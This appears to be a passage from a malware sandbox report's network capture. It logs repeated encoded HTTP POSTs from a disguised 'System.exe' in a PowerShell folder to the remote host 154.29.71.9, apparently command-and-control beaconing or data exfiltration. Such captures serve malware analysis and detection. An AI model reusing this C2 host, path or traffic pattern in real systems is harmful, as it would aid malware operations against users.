                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    84 | 192.168.2.4 | 49958 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:23.961766958 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:24.317012072 CET | 2600 | OUT | Data Raw: 59 5c 58 58 5b 5c 5d 50 5b 59 5a 55 50 5c 5b 5a 56 54 54 45 52 58 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\XX[\]P[YZUP\[ZVTTERXRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Y;%-?-;([(3^.3)"=0!(>=<C%#,9"Y ']/4
                                                                                                    Jan 4, 2025 14:53:24.489202023 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:24.624222994 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:24 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    85 | 192.168.2.4 | 49964 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:25.029465914 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:25.380672932 CET | 2600 | OUT | Data Raw: 5c 5a 58 50 5e 59 5d 50 5b 59 5a 55 50 5b 5b 50 56 51 54 49 52 59 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZXP^Y]P[YZUP[[PVQTIRYRYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9.-=X$;==-+<-+$]3,3Q"=;P!(P)>?&7:"Y ']/(
                                                                                                    Jan 4, 2025 14:53:25.565445900 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:25.697849035 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    86  192.168.2.4  49970  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:25.834310055 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:26.191931009 CET  2600  OUT
                                                                                                    Jan 4, 2025 14:53:26.351118088 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:26.478104115 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:26 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    87  192.168.2.4  49971  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:25.854712963 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:26.209472895 CET  1876  OUT
                                                                                                    Jan 4, 2025 14:53:26.371798992 CET  25  IN  HTTP/1.1 100 Continue


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    88  192.168.2.4  49977  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:26.610944986 CET  371  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:26.957564116 CET  2600  OUT
                                                                                                    Jan 4, 2025 14:53:27.146038055 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:27.277930975 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    89  192.168.2.4  49983  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:27.763329983 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:28.114315033 CET  2600  OUT
                                                                                                    Jan 4, 2025 14:53:28.281449080 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:28.410166979 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:28 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    90  192.168.2.4  49993  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:28.539103031 CET  371  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:28.895407915 CET  2600  OUT
                                                                                                    Jan 4, 2025 14:53:29.064785957 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:29.199867010 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    91  192.168.2.4  50000  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:29.320314884 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:29.676831007 CET  2596  OUT
                                                                                                    Jan 4, 2025 14:53:29.856415987 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:30.003753901 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    92  192.168.2.4  50002  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:30.309426069 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:30.661416054 CET  2600  OUT
                                                                                                    Jan 4, 2025 14:53:30.936518908 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:31.066277981 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    93  192.168.2.4  50008  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:31.195974112 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    94  192.168.2.4  50012  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:31.505256891 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:31.863778114 CET  1876  OUT
                                                                                                    Jan 4, 2025 14:53:32.040996075 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:32.174026966 CET  349  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    95  192.168.2.4  50014  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:31.649960041 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:32.004615068 CET | 2600 | OUT | Data Raw: 59 59 58 5e 5b 5f 58 54 5b 59 5a 55 50 59 5b 51 56 5d 54 45 52 5c 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YYX^[_XT[YZUPY[QV]TER\R[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9_/X&&;!*4+[/V',,3!!*(.4& ?-"Y ']/
                                                                                                    Jan 4, 2025 14:53:32.182209015 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:32.313163042 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    96 | 192.168.2.4 | 50020 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:32.486495018 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:32.833718061 CET | 2600 | OUT | Data Raw: 59 5a 58 5a 5e 5c 58 53 5b 59 5a 55 50 5f 5b 57 56 50 54 43 52 59 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YZXZ^\XS[YZUP_[WVPTCRYR[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,-:1=*=;?=;V%+[8&P685^5P)4E2$\-/"Y ']/
                                                                                                    Jan 4, 2025 14:53:33.022016048 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:33.153814077 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    97 | 192.168.2.4 | 50023 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:33.331659079 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:33.676403046 CET | 2600 | OUT | Data Raw: 59 5c 58 5d 5e 5c 58 50 5b 59 5a 55 50 5e 5b 55 56 5c 54 48 52 5e 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\X]^\XP[YZUP^[UV\THR^RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Y,:$(.>.(Y).0%+?.3 .,!(5V>>@1-"Y ']/<
                                                                                                    Jan 4, 2025 14:53:33.885107994 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:34.092838049 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:34 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    98 | 192.168.2.4 | 50028 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:34.235074997 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:34.582551003 CET | 2600 | OUT | Data Raw: 59 5f 58 5c 5b 5d 5d 54 5b 59 5a 55 50 59 5b 57 56 56 54 44 52 50 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y_X\[]]T[YZUPY[WVVTDRPR]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9.=9Y1%?.4?=';/3=5'P!(5>$$37-"Y ']/
                                                                                                    Jan 4, 2025 14:53:34.776689053 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:34.915107965 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:34 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    99 | 192.168.2.4 | 50034 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:35.055258036 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:35.410706043 CET | 2600 | OUT | Data Raw: 5c 59 5d 5b 5b 55 58 54 5b 59 5a 55 50 5e 5b 5a 56 55 54 40 52 5c 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \Y][[UXT[YZUP^[ZVUT@R\RPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9;9[%(V>-0(.'V3?,U!";"!(.+%#'-/"Y ']/<
                                                                                                    Jan 4, 2025 14:53:35.710746050 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:35.841968060 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
